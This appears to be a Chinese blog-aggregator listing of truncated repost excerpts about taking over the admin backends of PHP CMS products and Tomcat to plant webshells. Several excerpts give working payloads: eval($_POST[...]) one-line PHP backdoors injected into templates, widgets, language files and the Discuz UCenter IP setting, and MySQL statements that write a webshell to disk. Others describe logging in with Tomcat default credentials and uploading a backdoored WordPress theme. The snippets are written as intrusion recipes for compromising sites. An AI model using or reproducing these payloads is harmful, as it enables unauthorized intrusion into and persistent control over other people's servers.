漏洞的原理:具体的请看admin/global.php这个文件里面关于用户登陆部分的代码,这里截取一下。。。/*用户登录*/
if( $_POST[loginname] && $_POST[loginpwd] )
{
if( $webdb[yzImgAdminLogin] ){
if(!
转载
精选
2016-04-03 11:46:56
2559阅读
php168系统默认的缩略图尺寸200X150有的站长并不觉得顺手,我们来分享修改P8系统默认尺寸的方法:
只需要修改3个文件路径为:admin\inc\gather
修改的文件是:system.article.phpsystem.discuz.phpsystem.phpwind.php
3个文件都是执行以下操作:找到这行代码gdpic(PHP168_PATH."$web
转载
精选
2010-05-27 17:26:19
348阅读
有些Tomcat安装之后没有修改默认密码(用户名admin,密码为空),这样就可以直接登录进去。有两个目录可以访问:/admin/manager/html
/admin 目录下的利用:Service–host–actions–Create New Context建立虚拟目录Document Base填你想浏览的目录,比如c:\,Path自己随便写,例如/guizai然后直接http://ip/g
转载
2010-03-24 18:12:54
585阅读
正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧!
今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望大家都能成为脚本高手.
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞
转载
精选
2011-02-08 21:01:10
752阅读
进后台直奔扩展->挂件管理,下面的每一个挂件都对应着Php文件~拿第一个最新成交挂件举例,直接点击编辑脚本,写你的一句话,然后连接external\widgets\latest_sold\main.widget.php~OK~结束
~另外说下Ecmall现在公布的那个2.2延迟注射其实不用那么麻烦~直接爆错注入就可以了~虽然Ecmall发生错误时会自动跳转到上一页~但是那点儿时
原创
2011-05-21 12:03:30
1659阅读
方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POS
翻译
精选
2013-06-21 11:09:57
1503阅读
我记得以前看过这个资料,千翻万找总算翻了出来。
这个前提是可以编辑模板,不然我估计是没什么希望了。
templates/default/actions.lang.php(以这个为例)
在最底那提交
游客\');?>
\'g\'=>\'sdfsdf
便能写入一句话木马并正常执行.
原创
2007-12-08 15:38:00
1914阅读
来自t00ls
不是0day,只是之前用了一周的WP试着做博客来着。发现WP如果能进后台就可以直接拿SHELL的。
大牛说插入404文件,那个何必呢,动别人文件总归是不好,插挂了就悲剧了。
本机建立目录“wawa”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:
wp-content\themes\wa
转载
精选
2010-12-18 12:21:47
1856阅读
内容:
phpbb3 拿到管理员账号进去能干什么呢?又不能上传个SHELL。确实很头疼啊
搜半天都没搜到有牛人拿到过。难道没人研究它?
去年就试过些招。还是没搞定。今天遇到个phpbb3。终于还是拿到shell了。。。
要是能找到执行类似phpmyadmin之类的执行数据库语句的地方。拿shell还是比较简单的
需要两条语句。还有绝对路径。。如下
INSERT INTO phpbb
转载
2011-08-05 23:34:53
1523阅读
随着phpcms的开源,目前国内的开源整站系统(cms),已经有了三款功能比较强大的软
原创
2022-11-25 22:02:25
83阅读
随着phpcms的开源,目前国内的开源整站系统(cms),已经有了三
原创
2022-11-27 16:20:30
158阅读
来源:网络
dz后台-全局-ucenter ip地址插入:
3EST\\’);eval($_POST[a])?>;//
保存后再插入一遍!然后连 http://localhost/dz/config.inc.php成功!
以上我在dz7.0-dz.7.2最新官方下载版本测试通过。
转载
精选
2010-12-28 22:33:49
612阅读
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)
1.后台编辑customfaq(customfaq.lang.php文件)
在
Copy code
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Copy code
";eval($_
转载
精选
2008-01-29 16:43:00
521阅读
点模版管理-自定也页面-增加自定义页面 文件格式为.php 内容可以是一句话 可以是大马。。然后保存 在点管理自定义页面 找到你刚才那个 直接点页面名字,就可以访问。
转载
精选
2010-12-10 10:47:01
429阅读
来源:网络
dz后台-全局-ucenter ip地址插入:
3EST\\’);eval($_POST[a])?>;//
保存后再插入一遍!然后连 http://localhost/dz/config.inc.php成功!
以上我在dz7.0-dz.7.2最新官方下载版本测试通过。
转载
精选
2010-07-10 21:04:00
3740阅读
php后台拿shell要知道php的路径,文章下面将讲诉爆php路径的方法!!!方法一:CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[xiaoma])?>');SELECT xss1 FROM `mysq
转载
2014-04-01 15:44:00
127阅读
2评论
author:meao
www.secmao.tk 转载请注明
常规设置:站点地址和管理员邮箱处插入代码
站点地址:http://''''''''''''''<?php eval($_POST[cmd])?>'''''''''''''''''''''\\
管理员邮箱:''''''''''''''<?php eval($_POST[cmd])?>
转载
精选
2010-07-15 21:36:20
3875阅读
转自<sqlmap从入门到精通>资料 php后台拿shell要知道php的路径 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES
转载
2022-06-21 22:35:33
57阅读
